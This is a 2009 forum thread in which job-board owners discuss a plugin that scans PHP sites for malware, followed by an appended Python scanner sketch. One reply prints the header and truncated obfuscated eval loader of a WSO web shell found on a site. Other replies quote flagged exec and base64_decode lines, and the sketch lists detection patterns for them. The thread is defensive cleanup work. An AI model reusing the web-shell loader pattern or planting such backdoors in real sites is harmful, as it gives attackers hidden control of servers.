Jamit Software Forum
Author Topic: Security Tools Plugin  (Read 78280 times)
Adam
Administrator
Hero Member
*****
Posts: 112


« on: September 07, 2009, 05:32:36 am »

Just released the security tools plugin today. Available to download from http://www.jamit.com/plugins/SecurityTools.zip

Description: Recently, there has been an alarming increase in the number
of websites infected with malware. Your computer can be infected in seconds
just by visiting a malware infected site - even if you
have the latest anti-virus and upgrades installed.
A site infected with malware is then used to infect your site's visitors.
Once the malware is present on a desktop machine, it is able to steal FTP
passwords / login details and use these details to gain unauthorized access
to infect more sites.

This plugin scans your job board installation, and attempts
to hunt down the infections based on a few common signatures that we found
from analyzing a number of infected sites. The plugin scans PHP files
to find any unusual PHP code, and it is also able to scan some of the job
board's directories to hunt for files out of place.

Be aware, the scanner may report some false-positives.

Available to download from http://www.jamit.com/plugins/SecurityTools.zip

See README.txt for installation details.
Logged
dotmagic
Global Moderator
Sr. Member
*****
Posts: 85


« Reply #1 on: September 07, 2009, 02:14:20 pm »

Excellent plugin.

Nice to see Jamit take more steps towards security features of the script and the site.

I have installed it and tested it. Works great.

Thanks to Adam.

Thanks,
BV.
Logged
CompuDave
Global Moderator
Hero Member
*****
Posts: 173



WWW
« Reply #2 on: September 07, 2009, 04:08:37 pm »

Thanks for this. I have just completed installing and running the Security Tools Plugin. Seems to work very well and is very easy to use.

Firstly, a suggestion. Would it be possible to exclude certain folders when performing a scan? My initial scan returned a lot of "results" which were all related to other folders (ie openx, forum, etc).

Scan returned all non job board results.

Hunt returned one issue namely: 9340_tatto1247227692.mp3
However, when trying to locate this file, it is not visible from within my ftp client. The file is meant to be located in the "upload_files/docs" folder but all files in this folder start with 1, 2, 3 or 4.

Logged
rutulo
Jammers
Sr. Member
*
Posts: 40


« Reply #3 on: September 07, 2009, 07:09:11 pm »

I found a file with SCAN, file: wso22.php

content is:
<?php
/**
 * WSO 2
 * Web Shell by oRb
 */
$auth = array(
   'md5pass' => "63a9f0ea7bb98050796b649e85481845" // root
);
$color = "#df5";
@define('SELF_PATH', __FILE__);
eval(gzinflate(base64_decode('7X1rV9tKsuhnzlrnP3Q0nC17xxjbQCYxGMIbEkIIj5AHuRxZkm0F2dKWZAzJ8N9vVfVDLVk2Jtln7r1r3Zm1g9VdXV39qq6urqr2OiUWJ1EYxKX567Pd04+7p1/Ng/Pzk+sL+Lre3N89Pje/Vcz9IOj6rllmz1ot1rH82GVl9vM//2Ou51qOG5WozGK9WmPLtWV2HCRsLxgOHLO8CjDunZfA34f.....


It was in the public_html directory, and when I opened it in the browser, it just asked for a password. Now I have deleted it.
Logged
Peter
Administrator
Hero Member
*****
Posts: 248



« Reply #4 on: September 07, 2009, 10:57:06 pm »

Rutulo,

That's definitely malicious code. I admire you that you dared to view it in your browser.
Logged

SECURE your site BEFORE you wish you had! Use plugins by COLOSSAL MIND!
Amjad
Global Moderator
Hero Member
*****
Posts: 109


« Reply #5 on: September 08, 2009, 12:06:57 am »

Hi,
First, thank you for this much needed security tool.....

I installed it and ran it on my JB and I got the following warning message

Possibly bad code (execution of a shell command) /public_html/include/edit_config.php on line 909:
@exec ("w", $out);

any suggestions?

Regards,
Amjad
« Last Edit: September 08, 2009, 12:51:55 am by jobs.ps » Logged
Adam
Administrator
Hero Member
*****
Posts: 112


« Reply #6 on: September 08, 2009, 01:44:54 am »

wso22.php - definitely a back-door & should be deleted.
Mp3 files should be safe - it's a bug that the plugin flags them, it will be fixed for the next revision.
@exec ("w", $out); - it is totally safe, I'll put on the white list for the next version.
Thanks for reporting!
Logged
Adam
Administrator
Hero Member
*****
Posts: 112


« Reply #7 on: September 08, 2009, 01:51:02 am »

Amjad - your edit_config.php file is in the wrong directory, it should not be in include/ but in admin/, please delete it from include/
Logged
Amjad
Global Moderator
Hero Member
*****
Posts: 109


« Reply #8 on: September 08, 2009, 11:51:02 am »

Done
Thnx Adam
Logged
promotionbox.de
Jammers
Hero Member
*
Posts: 110



WWW
« Reply #9 on: September 09, 2009, 09:14:31 am »

Ok, the security tool works fine, no unusual code found. How often must I run the scan?

Thanks
-Thorsten
Logged

---
promotion:box | clever. smart. friendly.
www.promotionbox.de
abhishek1711
Guest
« Reply #10 on: September 29, 2009, 08:28:10 am »

guys this scares me - it shows 167 threats on my job board MbaNaukri.com - (users have sometimes complained when they try to visit site it says like "Urgent notice your website MBA naukri has been infected with trojan Virus. People having Kaspersky installed in their system cannot search your website after initial login")

have attached the results given by the plugin, plz help
Logged
Banenpak
Global Moderator
Hero Member
*****
Posts: 100


« Reply #11 on: September 30, 2009, 03:35:35 pm »

Thanks Adam!
Logged
Philcol
Jammers
Jr. Member
*
Posts: 15


« Reply #12 on: October 19, 2009, 09:09:31 pm »

Found a file:  class.php
line 36: 
$mess64 = base64_decode($_POST['message']);

Another:

adw.php
line 40: $mess64 = base64_decode($_POST['message']);

Delete?
Logged
Philcol
Jammers
Jr. Member
*
Posts: 15


« Reply #13 on: October 19, 2009, 09:40:31 pm »

Found another:

edit_config.php on line 909:
@exec ("w", $out);

Advice on this one? 
Logged
Philcol
Jammers
Jr. Member
*
Posts: 15


« Reply #14 on: October 19, 2009, 09:54:44 pm »

Found these on yet another domain:

include/functions2.php on line 231:
$make_magick = exec($command, $retval);

include/functions2.php on line 1701:
exec ("w", $out);

include/edit_config.php on line 909:
@exec ("w", $out);

cache/cat_f4_c0_cache.inc.php on line 2:
$category_table = unserialize('a:2:{s:2:"EN";a:3:{i:0;a:7:{s:3:"cid";s:3:"703";s:4:"cpid";s:1:"0";s:1:"n";s:15:"Consulting Firm";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:1;a:7:{s:3:"cid";s:3:"702";s:4:"cpid";s:1:"0";s:1:"n";s:24:"Private System Operator ";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:2;a:7:{s:3:"cid";s:3:"701";s:4:"cpid";s:1:"0";s:1:"n";s:22:"Water System (Public) ";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}}s:2:"ES";a:3:{i:0;a:7:{s:3:"cid";s:3:"703";s:4:"cpid";s:1:"0";s:1:"n";s:15:"Consulting Firm";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:1;a:7:{s:3:"cid";s:3:"702";s:4:"cpid";s:1:"0";s:1:"n";s:24:"Private System Operator ";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:2;a:7:{s:3:"cid";s:3:"701";s:4:"cpid";s:1:"0";s:1:"n";s:22:"Water System (Public) ";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}}}');
Logged
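The checks discussed in this thread (signature matching on PHP lines, excluding unrelated folders, allowlisting a known-benign line, and hunting for PHP files in upload directories), sketched as an added example; it is not the plugin's code or any poster's. The patterns, directory names and allowlist entry are assumptions, and the sample files are constructed.

```python
import re
from pathlib import PurePosixPath

# Patterns modelled on the findings quoted in this thread; constructed for
# illustration, not the Security Tools plugin's real signature list.
SIGNATURES = [
    ("obfuscated eval", re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(")),
    ("base64-decoded request data",
     re.compile(r"base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b")),
    ("execution of a shell command",
     re.compile(r"\b(?:exec|shell_exec|system|passthru)\s*\(")),
]
PHP_EXT = {".php", ".phtml", ".inc"}
EXCLUDE_DIRS = {"openx", "forum"}      # assumed: other apps sharing the docroot
UPLOAD_DIRS = {"upload_files"}         # no PHP should ever live here
# Allowlist is keyed on path AND exact line, so the same statement in a copy
# of the file that sits in the wrong directory is still reported.
ALLOWLIST = {("admin/edit_config.php", '@exec ("w", $out);')}

def scan(files):
    """files: {relative path: text}. Returns sorted (path, line_no, reason)."""
    findings = []
    for path, text in files.items():
        p = PurePosixPath(path)
        if p.parts[0] in EXCLUDE_DIRS or p.suffix.lower() not in PHP_EXT:
            continue  # skipped folder, or not PHP (e.g. an uploaded .mp3)
        if p.parts[0] in UPLOAD_DIRS:
            findings.append((path, 0, "PHP file out of place in upload directory"))
        for no, line in enumerate(text.splitlines(), 1):
            if (path, line.strip()) in ALLOWLIST:
                continue
            for reason, rx in SIGNATURES:
                if rx.search(line):
                    findings.append((path, no, reason))
    return sorted(findings)

# Constructed sample tree; payloads are placeholders, not real malware.
SAMPLE = {
    "wso22.php": "<?php\neval(gzinflate(base64_decode('PLACEHOLDER')));\n",
    "class.php": "<?php\n$mess64 = base64_decode($_POST['message']);\n",
    "admin/edit_config.php": '<?php\n@exec ("w", $out);\n',
    "include/edit_config.php": '<?php\n@exec ("w", $out);\n',
    "forum/Sources/Subs.php": "<?php\nexec($cmd);\n",
    "upload_files/docs/9340_tatto.mp3": "ID3 binary data",
    "upload_files/docs/notes.php": "<?php echo 1;\n",
}

if __name__ == "__main__":
    for path, no, reason in scan(SAMPLE):
        print(f"{path}:{no}: {reason}")
```

A line number of 0 marks a finding about the file's location rather than a specific line.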